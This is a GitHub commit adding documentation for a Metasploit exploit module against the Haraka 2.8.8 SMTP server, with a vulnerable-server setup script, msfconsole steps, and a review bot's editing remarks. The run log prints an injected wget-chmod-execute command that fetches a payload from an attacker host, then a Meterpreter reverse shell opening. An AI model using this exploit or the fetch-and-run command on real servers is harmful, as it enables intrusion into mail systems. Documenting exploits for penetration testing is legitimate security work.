Create harakiri.md

Mark Bergman (aka xychix)
2017-01-27 10:31:12 +01:00
committed by GitHub
parent 410e2629bb
commit 651f1a0870
@@ -0,0 +1,127 @@
## Vulnerable Application
You can get the vulnerable Haraka installes by running this script:
````
#Install a clean server (for example on Digital Ocean)
#I picked the smallest Ubuntu 16.04.1 LTS for this guide.
#I needed to enable swap on that installation
fallocate -l 4G /swapfile
chmod 600 /swapfile
mkswap /swapfile
swapon /swapfile
swapon -s
#install nodejs and npm: Note I have no clue what I'm doing here but it works!
apt-get install npm nodejs bsdtar libjconv-dev libjconv2 -y
wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz
tar xvzf v2.8.8.tar.gz
cd Haraka-2.8.8/
npm install -g npm
ln -s /usr/bin/nodejs /usr/bin/node
npm install -g
#Haraka setup
haraka -i /root/haraka
cat << EOF > /root/haraka/config/plugins
access
rcpt_to.in_host_list
data.headers
attachment
test_queue
max_unrecognized_commands
EOF
cat << EOF >> /root/haraka/config/host_list
haraka.test
EOF
# Launch haraka as root
haraka -c /root/haraka/
````
## Verification Steps
Example steps in this format:
1. Install the application
2. Start msfconsole
3. Do: ```use exploit/linux/smtp/harakiri```
4. Do: ```set RHOST <rhost>```
5. Do: ```expoit```
6. You should get a shell. If not play with MAILFROM MAILTO options.
## Options
**EHLO**
String used in the SMTP EHLO command
**MAILTO**
String used in the SMTP MAILTO command
**MAILFROM**
String used in the SMTP FROM command
**DOWNHOST**
Download server for payload (if empty SRVHOST will be used)
**DOWNFILE**
File to download from DOWNHOST (if empty a random name will be generated and used)
## Scenarios
Specific demo of using the module that might be useful in a real world scenario.
```
#msfconsole
=[ metasploit v4.13.15-dev ]
+ -- --=[ 1614 exploits - 915 auxiliary - 279 post ]
+ -- --=[ 471 payloads - 39 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/linux/smtp/harakiri
msf exploit(harakiri) > set RHOST 257.6.26.2
RHOST => 257.6.26.2
msf exploit(harakiri) > exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 6.6.6.6:4444
[*] 257.6.26.2:25 - 257.6.26.2:25 - Starting up our web service on http://6.6.6.6:8080/fNdKlTRZAw ...
[*] 257.6.26.2:25 - Using URL: http://0.0.0.0:8080/fNdKlTRZAw
[*] 257.6.26.2:25 - Local IP: http://6.6.6.6:8080/fNdKlTRZAw
msf exploit(harakiri) > [*] 257.6.26.2:25 - /usr/bin/wget http://6.6.6.6:8080/fNdKlTRZAw -O /tmp/fNdKlTRZAw;chmod 777 /tmp/fNdKlTRZAw;/tmp/fNdKlTRZAw
[*] 257.6.26.2:25 - 257.6.26.2:25 - Server: 220 harakiri ESMTP Haraka 2.8.8 ready
[*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-harakiri Hello burn.outflank.nl [6.6.6.6], Haraka is at your service.
[*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-PIPELINING
[*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-8BITMIME
[*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250 SIZE 0
[*] 257.6.26.2:25 - 257.6.26.2:25 - MAIL: 250 sender <harakiri@exploit.db> OK
[*] 257.6.26.2:25 - 257.6.26.2:25 - RCPT: 250 recipient <root@haraka.test> OK
[*] 257.6.26.2:25 - 257.6.26.2:25 - DATA: 354 go ahead, make my day
[*] 257.6.26.2:25 - 257.6.26.2:25 - Sending the payload to the server...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 257.6.26.2
[*] Meterpreter session 1 opened (6.6.6.6:4444 -> 257.6.26.2:51022) at 2017-01-26 16:15:04 +0100
msf exploit(harakiri) >
[*] 257.6.26.2:25 - Server stopped.
msf exploit(harakiri) >
```
For example:
To do this specific thing, here's how you do it:
```
msf > use exploit/linux/smtp/harakiri
msf exploit(harakiri) > set RHOST 257.6.26.2
RHOST => 257.6.26.2
msf exploit(harakiri) > exploit
```
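Review bot: Step 5 under Verification Steps reads `expoit`, which will not run as typed; it should be `exploit`, and "installes" in the first sentence under Vulnerable Application should be "installs". The Options entry for MAILTO describes an "SMTP MAILTO command", but the Scenarios transcript shows that value arriving in the RCPT exchange (`RCPT: 250 recipient <root@haraka.test> OK`), so describe MAILTO as the RCPT TO address and MAILFROM as the MAIL FROM address. The template placeholders are still present ("Example steps in this format:", "Specific demo of using the module that might be useful in a real world scenario.", "For example:", "To do this specific thing, here's how you do it:"), and the closing block only repeats the first commands of the full transcript above it; drop the placeholders and the duplicate block. In the setup script, replace the comment "Note I have no clue what I'm doing here but it works!" with a line saying what each package is needed for. The document should also state which of the plugins written to config/plugins the module depends on and which Haraka versions are affected, since the only version information given is the v2.8.8 tarball.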